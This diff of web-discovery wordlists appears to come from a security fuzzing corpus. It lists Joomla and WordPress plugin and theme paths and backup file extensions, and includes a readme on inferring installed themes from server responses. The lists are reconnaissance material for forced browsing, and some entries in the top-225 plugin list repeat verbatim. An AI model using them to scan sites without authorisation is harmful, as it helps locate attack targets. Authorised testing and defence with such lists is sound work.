themes/yui_grid/
|
||||
themes/zen/
|
||||
themes/zen_basic/
|
||||
themes/zen_deleon2/
|
||||
themes/zen_midnight/
|
||||
themes/zen_ninesixty/
|
||||
themes/zen_twilight/
|
||||
themes/zenland/
|
||||
themes/zental/
|
||||
themes/zenzen/
|
||||
themes/zeropoint/
|
||||
themes/zilo_blog/
|
||||
themes/zubrick/
|
224
discovery/predictable-filepaths/cms/joomla_plugins.txt
Normal file
224
discovery/predictable-filepaths/cms/joomla_plugins.txt
Normal file
|
@ -0,0 +1,224 @@
|
|||
components/com_acajoom/
|
||||
components/com_aclassf/
|
||||
components/com_acmisc/
|
||||
components/com_adsmanager/
|
||||
components/com_agora/
|
||||
components/com_ajaxchat/
|
||||
components/com_akogallery/
|
||||
components/com_album/
|
||||
components/com_allvideosreloaded/
|
||||
components/com_alphauserpoints/
|
||||
components/com_aprice/
|
||||
components/com_artportal/
|
||||
components/com_avreloaded/
|
||||
components/com_banners/
|
||||
components/com_bfsurvey_basic/
|
||||
components/com_booklibrary/
|
||||
components/com_bookmarks/
|
||||
components/com_carman/
|
||||
components/com_cartikads/
|
||||
components/com_casino/
|
||||
components/com_cbresumebuilder/
|
||||
components/com_chatroom/
|
||||
components/com_ckforms/
|
||||
components/com_comment/
|
||||
components/com_comprofiler/
|
||||
components/com_contact/
|
||||
components/com_contactus/
|
||||
components/com_content/
|
||||
components/com_ContentBlogList/
|
||||
components/com_cronjobs/
|
||||
components/com_customquickicons/
|
||||
components/com_dhforum/
|
||||
components/com_digifolio/
|
||||
components/com_digistore/
|
||||
components/com_djcatalog/
|
||||
components/com_dm_orders/
|
||||
components/com_docman/
|
||||
components/com_doqment/
|
||||
components/com_easygallery/
|
||||
components/com_easygb/
|
||||
components/com_easygb2/
|
||||
components/com_eventlist/
|
||||
components/com_events/
|
||||
components/com_extplorer/
|
||||
components/com_ezine/
|
||||
components/com_ezrealty/
|
||||
components/com_facebook/
|
||||
components/com_facileforms/
|
||||
components/com_fastball/
|
||||
components/com_favourites/
|
||||
components/com_fireboard/
|
||||
components/com_flickr4j/
|
||||
components/com_foobla_suggestions/
|
||||
components/com_form/
|
||||
components/com_forum/
|
||||
components/com_frontpage/
|
||||
components/com_games/
|
||||
components/com_gameserver/
|
||||
components/com_gcalendar/
|
||||
components/com_groups/
|
||||
components/com_hbssearch/
|
||||
components/com_hiscat/
|
||||
components/com_icrmbasic/
|
||||
components/com_idoblog/
|
||||
components/com_intuit/
|
||||
components/com_intuitLocal/
|
||||
components/com_invite/
|
||||
components/com_jabode/
|
||||
components/com_jbook/
|
||||
components/com_jbudgetsmagic/
|
||||
components/com_jcalpro/
|
||||
components/com_jce/
|
||||
components/com_jcomments/
|
||||
components/com_jeemaarticlecollection/
|
||||
components/com_jinc/
|
||||
components/com_jmovies/
|
||||
components/com_job/
|
||||
components/com_jomcomment/
|
||||
components/com_joomap/
|
||||
components/com_joomfish/
|
||||
components/com_joomlapack/
|
||||
components/com_joomlastats/
|
||||
components/com_joomlaxplorer/
|
||||
components/com_joomportfolio/
|
||||
components/com_joomunity/
|
||||
components/com_j-projects/
|
||||
components/com_jreservation/
|
||||
components/com_jshop/
|
||||
components/com_jsjobs/
|
||||
components/com_jtips/
|
||||
components/com_juser/
|
||||
components/com_kide/
|
||||
components/com_letterman/
|
||||
components/com_livechat/
|
||||
components/com_login/
|
||||
components/com_mailto/
|
||||
components/com_media/
|
||||
components/com_messages/
|
||||
components/com_messenger/
|
||||
components/com_Mochigames/
|
||||
components/com_morfeoshow/
|
||||
components/com_moschat/
|
||||
components/com_mosres/
|
||||
components/com_mytube/
|
||||
components/com_network/
|
||||
components/com_newsfeeds/
|
||||
components/com_ninjacentral/
|
||||
components/com_omphotogallery/
|
||||
components/com_oprykningspoint_mc/
|
||||
components/com_otzivi/
|
||||
components/com_page/
|
||||
components/com_parainvite/
|
||||
components/com_paxxgallery/
|
||||
components/com_perchagallery/
|
||||
components/com_personel/
|
||||
components/com_photo/
|
||||
components/com_photoblog/
|
||||
components/com_places/
|
||||
components/com_poll/
|
||||
components/com_ponygallery/
|
||||
components/com_privmsgs/
|
||||
components/com_proofreader/
|
||||
components/com_qcache/
|
||||
components/com_rate/
|
||||
components/com_rating/
|
||||
components/com_registration/
|
||||
components/com_rsform/
|
||||
components/com_rsgallery2/
|
||||
components/com_rss/
|
||||
components/com_schools/
|
||||
components/com_search/
|
||||
components/com_sef/
|
||||
components/com_sef/
|
||||
components/com_seminar/
|
||||
components/com_seyret/
|
||||
components/com_shoutbox/
|
||||
components/com_siirler/
|
||||
components/com_simple_review/
|
||||
components/com_simpleshop/
|
||||
components/com_sobi2/
|
||||
components/com_soundset/
|
||||
components/com_sportfusion/
|
||||
components/com_store/
|
||||
components/com_subscribe/
|
||||
components/com_surveymanager/
|
||||
components/com_swmenufree/
|
||||
components/com_thumbnailpro/
|
||||
components/com_tpjobs/
|
||||
components/com_trabalhe_conosco/
|
||||
components/com_tupinambis/
|
||||
components/com_user/
|
||||
components/com_users/
|
||||
components/com_virtualkiss/
|
||||
components/com_virtuemart/
|
||||
components/com_vxdate/
|
||||
components/com_webcamxp/
|
||||
components/com_weblinks/
|
||||
components/com_weblogs/
|
||||
components/com_wrapper/
|
||||
components/com_wrapper/
|
||||
components/com_wrapper/
|
||||
components/com_xmap/
|
||||
components/com_zcalendar/
|
||||
components/js_relevant/
|
||||
modules/mod_adscroller/
|
||||
modules/mod_archive/
|
||||
modules/mod_articles_archive/
|
||||
modules/mod_articles_category/
|
||||
modules/mod_articles_latest/
|
||||
modules/mod_articles_news/
|
||||
modules/mod_articles_popular/
|
||||
modules/mod_banners/
|
||||
modules/mod_breadcrumbs/
|
||||
modules/mod_briaskISS/
|
||||
modules/mod_ccnewsletter/
|
||||
modules/mod_custom/
|
||||
modules/mod_dn/
|
||||
modules/mod_feed/
|
||||
modules/mod_filterednews/
|
||||
modules/mod_flashmod/
|
||||
modules/mod_footer/
|
||||
modules/mod_forme/
|
||||
modules/mod_gk_news_image/
|
||||
modules/mod_internetradio/
|
||||
modules/mod_internetradio2/
|
||||
modules/mod_jabulletin/
|
||||
modules/mod_janewsflash/
|
||||
modules/mod_ja_slwi/
|
||||
modules/mod_jms_support/
|
||||
modules/mod_latestnews/
|
||||
modules/mod_login/
|
||||
modules/mod_mainmenu/
|
||||
modules/mod_menu/
|
||||
modules/mod_minifrontpage/
|
||||
modules/mod_mostread/
|
||||
modules/mod_newsflash/
|
||||
modules/mod_onlineusers/
|
||||
modules/mod_onlineusers_pro/
|
||||
modules/mod_poll/
|
||||
modules/mod_product_categories/
|
||||
modules/mod_productscroller/
|
||||
modules/mod_random_image/
|
||||
modules/mod_related_items/
|
||||
modules/mod_rokslideshow/
|
||||
modules/mod_rsform/
|
||||
modules/mod_search/
|
||||
modules/mod_sections/
|
||||
modules/mod_skychat/
|
||||
modules/mod_sobi2simplefeatured/
|
||||
modules/mod_sobidropdown/
|
||||
modules/mod_stats/
|
||||
modules/mod_swmenufree/
|
||||
modules/mod_syndicate/
|
||||
modules/mod_tcimageslider/
|
||||
modules/mod_users_latest/
|
||||
modules/mod_virtuemart/
|
||||
modules/mod_virtuemart_search/
|
||||
modules/mod_virtuemart_topten/
|
||||
modules/mod_vvisit_counter/
|
||||
modules/mod_weblinks/
|
||||
modules/mod_whosonline/
|
||||
modules/mod_woodychat/
|
||||
modules/mod_wrapper/
|
||||
modules/shoutbox/
|
30
discovery/predictable-filepaths/cms/joomla_themes.txt
Normal file
30
discovery/predictable-filepaths/cms/joomla_themes.txt
Normal file
|
@ -0,0 +1,30 @@
|
|||
templates/abc/
|
||||
templates/atomic/
|
||||
templates/b59-tpl8/
|
||||
templates/beez/
|
||||
templates/carbon_07/
|
||||
templates/crub/
|
||||
templates/dm_arrow_red/
|
||||
templates/gk_eshoptrix_2/
|
||||
templates/gk_gomuproject/
|
||||
templates/gk_icki_sports/
|
||||
templates/gk_musictop/
|
||||
templates/ja_purity/
|
||||
templates/ja_rochea/
|
||||
templates/ja_teline_ii/
|
||||
templates/joomlaport_metro/
|
||||
templates/js_relevant/
|
||||
templates/mynxx_j15/
|
||||
templates/planets/
|
||||
templates/planetsv2/
|
||||
templates/rhuk_milkyway/
|
||||
templates/rt_hivemind_j15/
|
||||
templates/rt_mediamogul_essentials_j15/
|
||||
templates/rt_nexus_j15/
|
||||
templates/siteground99/
|
||||
templates/siteground-j15-14/
|
||||
templates/siteground-j15-68/
|
||||
templates/siteground-j15-86/
|
||||
templates/system/
|
||||
templates/yoo_phoenix/
|
||||
templates/yoo_waybeyond/
|
2142
discovery/predictable-filepaths/cms/php-nuke.txt
Normal file
2142
discovery/predictable-filepaths/cms/php-nuke.txt
Normal file
File diff suppressed because it is too large
Load diff
1566
discovery/predictable-filepaths/cms/wordpress.txt
Normal file
1566
discovery/predictable-filepaths/cms/wordpress.txt
Normal file
File diff suppressed because it is too large
Load diff
|
@ -0,0 +1,46 @@
|
|||
404.php
|
||||
archive.php
|
||||
archives.php
|
||||
author.php
|
||||
category.php
|
||||
comments.php
|
||||
content.php
|
||||
data.php
|
||||
footer.php
|
||||
functions.php
|
||||
header.php
|
||||
home.php
|
||||
image.php
|
||||
images
|
||||
images/content-bg.jpg
|
||||
images/footer.jpg
|
||||
images/footer.png
|
||||
images/functions.php
|
||||
images/gravatar.png
|
||||
images/header-bg.jpg
|
||||
images/header.png
|
||||
images/index.php
|
||||
images/main_bg.png
|
||||
images/rss.png
|
||||
images/Thumbs.db
|
||||
index.php
|
||||
js
|
||||
js/html5.js
|
||||
languages
|
||||
license.txt
|
||||
License.txt
|
||||
links.php
|
||||
page.php
|
||||
print.css
|
||||
readme.txt
|
||||
reset.css
|
||||
rtl.css
|
||||
RTL.css
|
||||
searchform.php
|
||||
search.php
|
||||
sidebar.php
|
||||
single.php
|
||||
style.css
|
||||
tag.php
|
||||
tags.php
|
||||
|
13366
discovery/predictable-filepaths/cms/wp_plugins.txt
Normal file
13366
discovery/predictable-filepaths/cms/wp_plugins.txt
Normal file
File diff suppressed because it is too large
Load diff
225
discovery/predictable-filepaths/cms/wp_plugins_top225.txt
Normal file
225
discovery/predictable-filepaths/cms/wp_plugins_top225.txt
Normal file
|
@ -0,0 +1,225 @@
|
|||
google-sitemap-generator
|
||||
redirection
|
||||
wptouch
|
||||
ultimate-tinymce
|
||||
facebook
|
||||
wp-smushit
|
||||
share-this
|
||||
wp-super-cache
|
||||
iwp-client
|
||||
advanced-custom-fields
|
||||
broken-link-checker
|
||||
slideshow-jquery-image-gallery
|
||||
user-role-editor
|
||||
google-analytics-for-wordpress
|
||||
google-analyticator
|
||||
updraftplus
|
||||
wordpress-backup-to-dropbox
|
||||
bbpress
|
||||
wysija-newsletters
|
||||
add-to-any
|
||||
youtube-embed-plus
|
||||
backwpup
|
||||
backupwordpress
|
||||
wp-pagenavi
|
||||
tinymce-advanced
|
||||
gallery-plugin
|
||||
addthis
|
||||
easy-fancybox
|
||||
stats
|
||||
disable-comments
|
||||
antispam-bee
|
||||
wp-multibyte-patch
|
||||
wp-slimstat
|
||||
add-link-to-facebook
|
||||
wp-photo-album-plus
|
||||
buddypress
|
||||
social-networks-auto-poster-facebook-twitter-g
|
||||
events-manager
|
||||
responsive-add-ons
|
||||
easy-contact-forms
|
||||
post-types-order
|
||||
image-widget
|
||||
wp-maintenance-mode
|
||||
regenerate-thumbnails
|
||||
squirrly-seo
|
||||
qtranslate
|
||||
google-analytics-dashboard-for-wp
|
||||
ml-slider
|
||||
hupso-share-buttons-for-twitter-facebook-google
|
||||
powerpress
|
||||
mappress-google-maps-for-wordpress
|
||||
types
|
||||
options-framework
|
||||
ultimate-coming-soon-page
|
||||
page-links-to
|
||||
official-statcounter-plugin-for-wordpress
|
||||
wp-e-commerce
|
||||
wordpress-popular-posts
|
||||
shareaholic
|
||||
floating-social-media-icon
|
||||
sucuri-scanner
|
||||
breadcrumb-navxt
|
||||
really-simple-facebook-twitter-share-buttons
|
||||
si-captcha-for-wordpress
|
||||
google-sitemap-plugin
|
||||
wp-rss-multi-importer
|
||||
easy-table
|
||||
xhanch-my-twitter
|
||||
growmap-anti-spambot-plugin
|
||||
sexybookmarks
|
||||
all-in-one-event-calendar
|
||||
download-manager
|
||||
the-events-calendar
|
||||
jquery-updater
|
||||
newsletter
|
||||
wp-postviews
|
||||
lightbox-plus
|
||||
wp-postratings
|
||||
testimonials-widget
|
||||
limit-login-attempts
|
||||
adrotate
|
||||
embedplus-for-wordpress
|
||||
all-in-one-wp-security-and-firewall
|
||||
disqus-comment-system
|
||||
social-media-feather
|
||||
mailchimp-for-wp
|
||||
xml-sitemap-feed
|
||||
mp6
|
||||
wp-lightbox-2
|
||||
ultimate-maintenance-mode
|
||||
wp-postviews
|
||||
lightbox-plus
|
||||
wp-postratings
|
||||
testimonials-widget
|
||||
limit-login-attempts
|
||||
adrotate
|
||||
embedplus-for-wordpress
|
||||
all-in-one-wp-security-and-firewall
|
||||
disqus-comment-system
|
||||
social-media-feather
|
||||
mailchimp-for-wp
|
||||
xml-sitemap-feed
|
||||
mp6
|
||||
wp-lightbox-2
|
||||
ultimate-maintenance-mode
|
||||
social-media-widget
|
||||
mailchimp
|
||||
commentluv
|
||||
ozh-admin-drop-down-menu
|
||||
seo-ultimate
|
||||
custom-field-template
|
||||
black-studio-tinymce-widget
|
||||
relevanssi
|
||||
seo-facebook-comments
|
||||
maintenance
|
||||
tablepress
|
||||
genesis-simple-sidebars
|
||||
clean-and-simple-contact-form-by-meg-nicholas
|
||||
all-in-one-favicon
|
||||
woosidebars
|
||||
printfriendly
|
||||
visual-form-builder
|
||||
wordpress-ping-optimizer
|
||||
wp-google-fonts
|
||||
wp-security-scan
|
||||
wp-google-maps
|
||||
simple-tags
|
||||
wponlinebackup
|
||||
theme-my-login
|
||||
formidable
|
||||
wpremote
|
||||
wowslider
|
||||
contact-form-7-to-database-extension
|
||||
gotmls
|
||||
jw-player-plugin-for-wordpress
|
||||
jetpack
|
||||
akismet
|
||||
all-in-one-seo-pack
|
||||
contact-form-7
|
||||
wordpress-seo
|
||||
nextgen-gallery
|
||||
wordpress-importer
|
||||
better-wp-security
|
||||
woocommerce
|
||||
w3-total-cache
|
||||
wordfence
|
||||
captcha
|
||||
si-contact-form
|
||||
really-simple-captcha
|
||||
contact-form-plugin
|
||||
ps-auto-sitemap
|
||||
sociable
|
||||
hotfix
|
||||
genesis-enews-extended
|
||||
adsense-plugin
|
||||
easy-theme-and-plugin-upgrades
|
||||
ultimate-tag-cloud-widget
|
||||
sidebar-login
|
||||
secure-wordpress
|
||||
seo-image
|
||||
search-and-replace
|
||||
widget-logic
|
||||
contextual-related-posts
|
||||
media-element-html5-video-and-audio-player
|
||||
wp-optimize
|
||||
wiziapp-create-your-own-native-iphone-app
|
||||
simply-instagram
|
||||
lightbox-gallery
|
||||
nrelate-related-content
|
||||
booking
|
||||
html-javascript-adder
|
||||
responsive-lightbox
|
||||
simple-backup
|
||||
link-library
|
||||
contact-form-maker
|
||||
wp-customer-reviews
|
||||
genesis-simple-hooks
|
||||
wp-db-backup
|
||||
easing-slider
|
||||
google-maps-widget
|
||||
wiziapp-create-your-own-native-iphone-app
|
||||
simply-instagram
|
||||
lightbox-gallery
|
||||
nrelate-related-content
|
||||
booking
|
||||
html-javascript-adder
|
||||
responsive-lightbox
|
||||
simple-backup
|
||||
link-library
|
||||
contact-form-maker
|
||||
wp-customer-reviews
|
||||
genesis-simple-hooks
|
||||
wp-db-backup
|
||||
easing-slider
|
||||
google-maps-widget
|
||||
easy-adsense-lite
|
||||
wp-dbmanager
|
||||
codepeople-post-map
|
||||
landing-pages
|
||||
google-xml-sitemaps-v3-for-qtranslate
|
||||
woocommerce-all-in-one-seo-pack
|
||||
option-tree
|
||||
wp-polls
|
||||
google-analytics-dashboard
|
||||
simple-lightbox
|
||||
wp-user-avatar
|
||||
coming-soon-maintenance-mode-ready
|
||||
quick-pagepost-redirect-plugin
|
||||
chartbeat
|
||||
nextgen-facebook
|
||||
wp-mail-smtp
|
||||
quick-cache
|
||||
link-manager
|
||||
video-thumbnails
|
||||
soliloquy-lite
|
||||
my-calendar
|
||||
ckeditor-for-wordpress
|
||||
kebo-twitter-feed
|
||||
auto-post-thumbnail
|
||||
gtranslate
|
||||
yop-poll
|
||||
wp-filebase
|
||||
all-in-one-webmaster
|
||||
email-users
|
||||
leaflet-maps-marker
|
12
discovery/predictable-filepaths/cms/wp_themes.readme
Normal file
12
discovery/predictable-filepaths/cms/wp_themes.readme
Normal file
|
@ -0,0 +1,12 @@
|
|||
Themes usually live in a directory called wp-content.
|
||||
|
||||
Determine how the server handles directories which aren't present vs files which aren't present in a path that exists in order to tell which themes are installed.
|
||||
|
||||
use wp_common_theme_files.fuzz.php inside the identified theme dirs
|
||||
|
||||
Often you can tell the current theme by viewing source.
|
||||
|
||||
Theme list generated last on Sept 6 2013
|
||||
|
||||
from: http://themes.svn.wordpress.org
|
||||
|
7336
discovery/predictable-filepaths/cms/wp_themes.txt
Normal file
7336
discovery/predictable-filepaths/cms/wp_themes.txt
Normal file
File diff suppressed because it is too large
Load diff
File diff suppressed because it is too large
Load diff
|
@ -0,0 +1,80 @@
|
|||
.asp
|
||||
.aspx
|
||||
.bat
|
||||
.c
|
||||
.cfm
|
||||
.cgi
|
||||
.com
|
||||
.dll
|
||||
.exe
|
||||
.htm
|
||||
.html
|
||||
.inc
|
||||
.jhtml
|
||||
.jsa
|
||||
.jsp
|
||||
.log
|
||||
.mdb
|
||||
.nsf
|
||||
.php
|
||||
.php2
|
||||
.php3
|
||||
.php4
|
||||
.php5
|
||||
.php6
|
||||
.php7
|
||||
.phtml
|
||||
.phps
|
||||
.pl
|
||||
.reg
|
||||
.sh
|
||||
.shtml
|
||||
.sql
|
||||
.txt
|
||||
.xml
|
||||
.swf
|
||||
.pcap
|
||||
.001
|
||||
.002
|
||||
.1
|
||||
.2
|
||||
.7z
|
||||
.Z
|
||||
.back
|
||||
.backup
|
||||
.bak
|
||||
.bakup
|
||||
.bas
|
||||
.bz2
|
||||
.c
|
||||
.conf
|
||||
.copia
|
||||
.core
|
||||
.cpp
|
||||
.dat
|
||||
.db
|
||||
.default
|
||||
.dll
|
||||
.doc
|
||||
.ini
|
||||
.jar
|
||||
.java
|
||||
.old
|
||||
.orig
|
||||
.pas
|
||||
.rar
|
||||
.sav
|
||||
.saved
|
||||
.source
|
||||
.src
|
||||
.stackdump
|
||||
.tar
|
||||
.tar.gz
|
||||
.temp
|
||||
.test
|
||||
.tgz
|
||||
.tmp
|
||||
.txt
|
||||
.war
|
||||
.zip
|
||||
~
|
|
@ -0,0 +1,13 @@
|
|||
backup
|
||||
bck
|
||||
old
|
||||
save
|
||||
bak
|
||||
sav
|
||||
~
|
||||
copy
|
||||
old
|
||||
orig
|
||||
tmp
|
||||
txt
|
||||
back
|
|
@ -0,0 +1,863 @@
|
|||
$er
|
||||
123
|
||||
1pe
|
||||
1ph
|
||||
3dr
|
||||
3dt
|
||||
3me
|
||||
3pe
|
||||
4dl
|
||||
4dv
|
||||
8xk
|
||||
^^^
|
||||
a3l
|
||||
a3m
|
||||
a3w
|
||||
a4l
|
||||
a4m
|
||||
a4w
|
||||
a5l
|
||||
a5w
|
||||
a65
|
||||
aao
|
||||
ab
|
||||
ab1
|
||||
ab2
|
||||
ab3
|
||||
abcd
|
||||
abi
|
||||
abp
|
||||
aby
|
||||
aca
|
||||
acc
|
||||
accdb
|
||||
acf
|
||||
acg
|
||||
ade
|
||||
adp
|
||||
adt
|
||||
adx
|
||||
aft
|
||||
agd
|
||||
aifb
|
||||
alc
|
||||
ald
|
||||
ali
|
||||
amb
|
||||
amsorm
|
||||
an1
|
||||
anme
|
||||
apr
|
||||
arc
|
||||
arh
|
||||
ask
|
||||
asm
|
||||
ast
|
||||
at5
|
||||
att
|
||||
aw
|
||||
awg
|
||||
azw
|
||||
bafl
|
||||
bci
|
||||
bcm
|
||||
bdf
|
||||
bdic
|
||||
bfx
|
||||
bgl
|
||||
bgt
|
||||
bin
|
||||
bjo
|
||||
bk
|
||||
bkk
|
||||
blb
|
||||
bld
|
||||
blg
|
||||
bok
|
||||
box
|
||||
brd
|
||||
brw
|
||||
btf
|
||||
btif
|
||||
btm
|
||||
btr
|
||||
cap
|
||||
cat
|
||||
cbg
|
||||
cch
|
||||
ccr
|
||||
cct
|
||||
cdb
|
||||
cdd
|
||||
cdf
|
||||
cdp
|
||||
cdr
|
||||
cdx
|
||||
cel
|
||||
celtx
|
||||
chg
|
||||
chk
|
||||
chn
|
||||
ckd
|
||||
ckt
|
||||
cl2
|
||||
cl4
|
||||
clb
|
||||
clix
|
||||
clm
|
||||
clp
|
||||
cmbl
|
||||
cna
|
||||
contact
|
||||
cpi
|
||||
cpmz
|
||||
crd
|
||||
crtx
|
||||
csa
|
||||
csv
|
||||
ctf
|
||||
ctt
|
||||
cursorfx
|
||||
curxptheme
|
||||
cvd
|
||||
cvn
|
||||
cwk
|
||||
cws
|
||||
cwz
|
||||
cxt
|
||||
cyo
|
||||
cys
|
||||
daf
|
||||
dal
|
||||
dam
|
||||
das
|
||||
dat
|
||||
data
|
||||
db
|
||||
db2
|
||||
db3
|
||||
dbc
|
||||
dbd
|
||||
dbf
|
||||
dbx
|
||||
dcf
|
||||
dcl
|
||||
dcm
|
||||
dcmd
|
||||
ddc
|
||||
ddcx
|
||||
ddt
|
||||
dem
|
||||
des
|
||||
dex
|
||||
dfm
|
||||
dfproj
|
||||
dft
|
||||
dgb
|
||||
dif
|
||||
dii
|
||||
dlg
|
||||
dm2
|
||||
dmo
|
||||
dmsk
|
||||
dnc
|
||||
dockzip
|
||||
dp1
|
||||
dpn
|
||||
dpx
|
||||
drl
|
||||
dsb
|
||||
dsd
|
||||
dsk
|
||||
dsy
|
||||
dsz
|
||||
dt0
|
||||
dt1
|
||||
dt2
|
||||
dta
|
||||
dtr
|
||||
dvdproj
|
||||
dvo
|
||||
dwi
|
||||
e00
|
||||
eap
|
||||
ebuild
|
||||
ec0
|
||||
eco
|
||||
ecx
|
||||
edb
|
||||
edf
|
||||
eep
|
||||
efx
|
||||
egp
|
||||
emb
|
||||
emd
|
||||
emlxpart
|
||||
enc
|
||||
enw
|
||||
epp
|
||||
epub
|
||||
epw
|
||||
er1
|
||||
esp
|
||||
ess
|
||||
est
|
||||
esx
|
||||
et
|
||||
eta
|
||||
etd
|
||||
etl
|
||||
ev
|
||||
ev3
|
||||
evt
|
||||
evy
|
||||
exif
|
||||
exp
|
||||
exx
|
||||
fa
|
||||
fasta
|
||||
fbl
|
||||
fcd
|
||||
fcs
|
||||
fdb
|
||||
ffd
|
||||
ffwp
|
||||
fhc
|
||||
fid
|
||||
fil
|
||||
flame
|
||||
fll
|
||||
flo
|
||||
flp
|
||||
flt
|
||||
fm
|
||||
fm5
|
||||
fmp
|
||||
fo
|
||||
fob
|
||||
fol
|
||||
fop
|
||||
fox
|
||||
fp
|
||||
fp3
|
||||
fp4
|
||||
fp5
|
||||
fp7
|
||||
frl
|
||||
frm
|
||||
fro
|
||||
frx
|
||||
fsb
|
||||
fsc
|
||||
ftm
|
||||
ftw
|
||||
gan
|
||||
gbr
|
||||
gc
|
||||
gcx
|
||||
gdb
|
||||
ged
|
||||
gedcom
|
||||
gen
|
||||
ggb
|
||||
gml
|
||||
gms
|
||||
gno
|
||||
gnp
|
||||
gp3
|
||||
gpi
|
||||
gps
|
||||
gpx
|
||||
gra
|
||||
grade
|
||||
grf
|
||||
grib
|
||||
grk
|
||||
grr
|
||||
grv
|
||||
gs
|
||||
gst
|
||||
gtp
|
||||
gwk
|
||||
gxl
|
||||
hcc
|
||||
hce
|
||||
hci
|
||||
hcp
|
||||
hcr
|
||||
hcu
|
||||
hda
|
||||
hdb
|
||||
hdf
|
||||
hdi
|
||||
hdl
|
||||
hif
|
||||
hl
|
||||
hml
|
||||
hmt
|
||||
hs2
|
||||
hsk
|
||||
hst
|
||||
htg
|
||||
huh
|
||||
hyv
|
||||
i5z
|
||||
ib
|
||||
ics
|
||||
id2
|
||||
idx
|
||||
igc
|
||||
ihx
|
||||
ii
|
||||
iif
|
||||
img
|
||||
imt
|
||||
ink
|
||||
inp
|
||||
ins
|
||||
ip
|
||||
irock
|
||||
irr
|
||||
irx
|
||||
isf
|
||||
itdb
|
||||
itl
|
||||
itm
|
||||
itn
|
||||
itw
|
||||
itx
|
||||
ivt
|
||||
iw
|
||||
ixb
|
||||
jasper
|
||||
jdb
|
||||
jef
|
||||
jmp
|
||||
jnt
|
||||
job
|
||||
joboptions
|
||||
joined
|
||||
jph
|
||||
jrprint
|
||||
jrxml
|
||||
jude
|
||||
kap
|
||||
kdb
|
||||
kid
|
||||
kismac
|
||||
kmz
|
||||
kpf
|
||||
kpp
|
||||
kpr
|
||||
kpx
|
||||
kpz
|
||||
l
|
||||
l6t
|
||||
laccdb
|
||||
lbl
|
||||
lbx
|
||||
lcd
|
||||
lcf
|
||||
lcm
|
||||
ldif
|
||||
lex
|
||||
lgc
|
||||
lgf
|
||||
lgh
|
||||
lgi
|
||||
lgl
|
||||
lib
|
||||
lif
|
||||
livereg
|
||||
liveupdate
|
||||
lix
|
||||
llb
|
||||
lms
|
||||
lmx
|
||||
lnt
|
||||
loc
|
||||
lp7
|
||||
lrf
|
||||
lrs
|
||||
lrx
|
||||
lsf
|
||||
lsl
|
||||
lsp
|
||||
lsr
|
||||
lst
|
||||
lsu
|
||||
lvm
|
||||
lw4
|
||||
ly
|
||||
m
|
||||
mag
|
||||
mai
|
||||
map
|
||||
masseffectprofile
|
||||
mat
|
||||
mbb
|
||||
mbf
|
||||
mbg
|
||||
mbl
|
||||
mbp
|
||||
mbx
|
||||
mc1
|
||||
mc9
|
||||
mcd
|
||||
md
|
||||
mdb
|
||||
mdc
|
||||
mdf
|
||||
mdl
|
||||
mdm
|
||||
mdn
|
||||
mdt
|
||||
mdx
|
||||
mdz
|
||||
mem
|
||||
menc
|
||||
met
|
||||
mex
|
||||
mfo
|
||||
mfp
|
||||
mgc
|
||||
mls
|
||||
mm
|
||||
mmap
|
||||
mmc
|
||||
mmf
|
||||
mmp
|
||||
mnc
|
||||
mng
|
||||
mnk
|
||||
mno
|
||||
mny
|
||||
mobi
|
||||
moho
|
||||
mosaic
|
||||
mox
|
||||
mpd
|
||||
mpj
|
||||
mpp
|
||||
mpt
|
||||
mpx
|
||||
mpz
|
||||
mq4
|
||||
ms10
|
||||
mth
|
||||
mtw
|
||||
mud
|
||||
muf
|
||||
mw
|
||||
mwf
|
||||
mws
|
||||
mwx
|
||||
mxd
|
||||
myd
|
||||
myi
|
||||
nb
|
||||
nc
|
||||
ndf
|
||||
ndk
|
||||
ndx
|
||||
net
|
||||
neta
|
||||
nfo
|
||||
nitf
|
||||
nmind
|
||||
not
|
||||
notebook
|
||||
np
|
||||
npl
|
||||
npt
|
||||
nrl
|
||||
ns2
|
||||
ns3
|
||||
ns4
|
||||
nsf
|
||||
ntx
|
||||
numbers
|
||||
nvl
|
||||
nyf
|
||||
oab
|
||||
obj
|
||||
odb
|
||||
odf
|
||||
odp
|
||||
ods
|
||||
odx
|
||||
oeaccount
|
||||
ofc
|
||||
ofm
|
||||
oft
|
||||
ofx
|
||||
omcs
|
||||
omp
|
||||
ond
|
||||
one
|
||||
oo3
|
||||
opf
|
||||
opx
|
||||
or2
|
||||
or3
|
||||
or4
|
||||
or5
|
||||
or6
|
||||
org
|
||||
orx
|
||||
otf
|
||||
otl
|
||||
otln
|
||||
ots
|
||||
out
|
||||
ov2
|
||||
ova
|
||||
ovf
|
||||
p96
|
||||
p97
|
||||
pab
|
||||
paf
|
||||
pan
|
||||
pbd
|
||||
pc
|
||||
pcap
|
||||
pcb
|
||||
pcr
|
||||
pd4
|
||||
pd5
|
||||
pdas
|
||||
pdb
|
||||
pdd
|
||||
pdm
|
||||
pds
|
||||
pdx
|
||||
peb
|
||||
pec
|
||||
pep
|
||||
pex
|
||||
pfc
|
||||
pfl
|
||||
phb
|
||||
phm
|
||||
pi
|
||||
pis
|
||||
pjx
|
||||
pka
|
||||
pkb
|
||||
pkh
|
||||
pks
|
||||
pkt
|
||||
pln
|
||||
plw
|
||||
pmo
|
||||
pmr
|
||||
pnproj
|
||||
pnpt
|
||||
pns
|
||||
pnt
|
||||
pod
|
||||
poi
|
||||
pos
|
||||
postal
|
||||
pot
|
||||
potm
|
||||
potx
|
||||
pp2
|
||||
ppf
|
||||
pps
|
||||
ppsx
|
||||
ppt
|
||||
pptm
|
||||
pptx
|
||||
prc
|
||||
pre
|
||||
prf
|
||||
prj
|
||||
prm
|
||||
prs
|
||||
psa
|
||||
psf
|
||||
psm
|
||||
pst
|
||||
ptb
|
||||
ptf
|
||||
ptk
|
||||
ptm
|
||||
ptn
|
||||
ptt
|
||||
ptz
|
||||
pvl
|
||||
pwd
|
||||
pxj
|
||||
pxl
|
||||
q07
|
||||
q08
|
||||
q09
|
||||
q3d
|
||||
qbw
|
||||
qdat
|
||||
qdf
|
||||
qdfm
|
||||
qel
|
||||
qfx
|
||||
qif
|
||||
qpb
|
||||
qpf
|
||||
qph
|
||||
qpm
|
||||
qpw
|
||||
qrp
|
||||
qsd
|
||||
ral
|
||||
rbt
|
||||
rcd
|
||||
rcg
|
||||
rdb
|
||||
rdf
|
||||
rdx
|
||||
ref
|
||||
ret
|
||||
rf1
|
||||
rfa
|
||||
rfo
|
||||
rge
|
||||
rgn
|
||||
rgo
|
||||
rmuf
|
||||
rnq
|
||||
rod
|
||||
rog
|
||||
roi
|
||||
rou
|
||||
rpp
|
||||
rpt
|
||||
rrt
|
||||
rsc
|
||||
rsd
|
||||
rsw
|
||||
rte
|
||||
rvt
|
||||
